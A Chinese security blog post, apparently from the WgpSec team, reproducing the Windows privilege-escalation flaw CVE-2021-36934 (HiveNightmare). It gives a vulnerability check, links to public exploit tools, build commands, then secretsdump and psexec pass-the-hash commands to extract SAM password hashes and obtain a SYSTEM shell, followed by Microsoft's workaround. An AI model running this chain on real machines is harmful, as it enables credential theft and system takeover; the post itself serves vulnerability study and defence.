CVE-2021-36934 Windows提权漏洞复现

admin

102262
文章

87
评论

2021年7月24日13:39:02评论150 views字数 2289阅读7分37秒阅读模式

点击蓝字

关注我们

声明

本文作者：TeamsSix
本文字数：1270

阅读时长：20~30分钟

附件/链接：点击查看原文下载

本文属于【狼组安全社区】原创奖励计划，未经许可禁止转载

由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，狼组安全团队以及文章作者不为此承担任何责任。

前言

7 月 20 日，微软确认了一个新的本地提权漏洞，该漏洞会影响 Windows 自 2018 年 10 月以来发布的版本，即 Windows 10 Version 1809 以后的版本。

不过值得注意的是该漏洞不影响 Windows Server 版本。

对于这个漏洞安全研究成员将其称为 HiveNightmare 或者 SeriousSAM ，该漏洞允许低权限的用户访问 Windows 系统文件，成功利用此漏洞的攻击者可以使用 SYSTEM 特权运行任意代码。

根据微软的介绍，出现本地提权漏洞是由于多个系统文件（包括安全账户管理器数据库SAM）过度许可访问控制列表所导致。

目前 POC 和 EXP 已经被公开，利用公开的 POC 可以低权限账号读取 SAM 等文件。

一、

检查是否易受攻击

执行以下命令：

icacls C:windowssystem32configsam

如果输出 BUILTINUsers:(I)(RX) 表示该系统易受攻击。

CVE-2021-36934 Windows提权漏洞复现

如果输出 Access is denied 或拒绝访问表示该系统不易受攻击。

CVE-2021-36934 Windows提权漏洞复现

二、

漏洞复现

EXP 地址为：https://github.com/GossiTheDog/HiveNightmare

作者编译好的 exe 文件：

https://github.com/GossiTheDog/HiveNightmare/releases/download/0.5/HiveNightmare.exe

直接将作者编译好的 HiveNightmare.exe 拷贝到目标系统上执行，这里以 Windows 10 1809 为例。

CVE-2021-36934 Windows提权漏洞复现

可以看到在低权限账号下，成功利用 CVE-2021–36934 读取到了 SAM、SECURITY、SYSTEM 三个文件。

除了 HiveNightmare 项目外，ShadowSteal 项目也能实现同样的效果，不过该项目需要编译使用，编译步骤如下：

在 Linux 下运行以下命令，以 Kali 为例。

sudo apt-get install nimnimble install zippy argparsenimble install winimsudo apt-get install mingw-w64git clone https://github.com/HuskyHacks/ShadowSteal.git && cd ShadowStealmake && cd bin/ && ls -l

将编译好的 ShadowSteal.exe 放到目标系统上直接执行即可。

CVE-2021-36934 Windows提权漏洞复现

在获得 SAM、SECURITY、SYSTEM 文件后，我们就可以使用 secretsdump.py 获取目标用户的 hash 了。

git clone https://github.com/SecureAuthCorp/impacket.gitcd impacket/examplespython3 secretsdump.py -sam SAM-2021-06-17 -system SYSTEM-2021-06-17 -security SECURITY-2021-06-17 LOCAL

CVE-2021-36934 Windows提权漏洞复现

再使用 psexec.py 直接利用 administrator 的 hash 登录管理员账户，获得 SYSTEM 权限会话。

python3 psexec.py -hashes xxxxxxxxxxxxxx:xxxxxxxxxxxxxxxxx [email protected] cmd.exe

CVE-2021-36934 Windows提权漏洞复现

三、

修复方案

微软目前仍在研究该漏洞（编号为CVE-2021-36934），还未发布补丁更新。不过微软提供了一个临时性的解决方案。

1、限制对 %windir%system32config 内容的访问

以管理员身份打开命令提示符或 Windows PowerShell，运行以下命令：icacls %windir%system32config*.* /inheritance:e

2、删除卷影复制服务 (VSS) 卷影副本

删除限制访问 %windir%system32config 之前存在的任何系统还原点和卷影卷，创建一个新的系统还原点（如果需要）。

不过在操作时需要注意的是，从系统中删除卷影副本会影响系统和文件的“恢复“操作。

后记

参考文章：

https://mp.weixin.qq.com/s/zSHwBUe-1ObumPt6v0pxMg

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36934

https://mp.weixin.qq.com/s?__biz=MzU5NDgxODU1MQ==&mid=2247494395&idx=1&sn=c40e68e018c2112d7e3ce74b9a55c724

作者

TeamsSix

我靠着那加给我力量的，凡事都能作。(腓立比书 4:13 和合本)

扫描关注公众号回复加群

和师傅们一起讨论研究~

长

按

关

注

WgpSec狼组安全团队

微信号：wgpsec

Twitter：@wgpsec

本文始发于微信公众号（WgpSec狼组安全团队）：CVE-2021-36934 Windows提权漏洞复现

左青龙
微信扫一扫

右白虎
微信扫一扫

CVE-2021-36934 Windows提权漏洞复现

【论文速读】|理解基于大语言模型的模糊测试驱动程序生成

Web攻击应急响应 | 干货

基于ChatGPT大语言模型，通过聊天机器人自动创建vulhub的漏洞靶机环境

科恩BinaryAI@ICSE2024论文解读｜基于大模型的二进制软件成分分析

网络认证：一文带你了解Juniper认证体系！

eBPF及HTTPS明文抓包的分析

京师心智心理健康测评系统 MyReport.ashx 信息泄露漏洞复现

shiro反序列化漏洞绕waf防护的方法总结 | 干货

关于我挖洞的经历

LLM 安全 | 大语言模型应用安全入门

发表评论

在线咨询

微信